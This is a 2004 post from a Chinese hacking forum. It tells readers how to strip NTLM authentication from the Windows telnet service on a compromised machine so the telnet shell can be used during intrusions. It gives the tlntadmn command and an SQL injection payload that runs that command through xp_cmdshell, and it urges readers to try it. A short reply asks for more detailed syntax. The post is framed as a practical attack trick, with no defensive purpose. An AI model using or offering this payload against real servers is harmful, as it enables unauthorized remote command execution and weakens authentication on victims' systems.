飘云阁

 找回密码
 加入我们

QQ登录

只需一步,快速开始

查看: 2026|回复: 1

@_@

[复制链接]
  • TA的每日心情
    奋斗
    2019-3-2 15:28
  • 签到天数: 6 天

    [LV.2]偶尔看看I

    发表于 2004-12-28 07:54:51 | 显示全部楼层 |阅读模式
    相信大家都对telnet比较熟悉吧。hacking的时候经常用到的系统自带shell尤其是注射的时候,但是最讨厌的就是ntlm认证了,以前大家去掉ntlm的方法一般有2种。

    1 上传ntml.exe 这种方法有很多缺点,比如:对方有杀毒软件,很多网段屏蔽了TFTP.

    2 直接写入telnet的配置信息到文本中然后在用shell执行。 这种办法非常麻烦。


    今天我给大家介绍我一直在使用的办法,压箱底的哦。

    那就是直接运行命令:tlntadmn config sec = -ntlm


    注射的话可以直接运行:;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--

    运行以后就去掉了该死的ntlm认证:) 赶快去试试吧。
    PYG19周年生日快乐!
  • TA的每日心情
    开心
    2024-12-1 11:04
  • 签到天数: 12 天

    [LV.3]偶尔看看II

    发表于 2004-12-28 12:44:11 | 显示全部楼层
    请把语法写详细一点,OK!
    PYG19周年生日快乐!
    您需要登录后才可以回帖 登录 | 加入我们

    本版积分规则

    快速回复 返回顶部 返回列表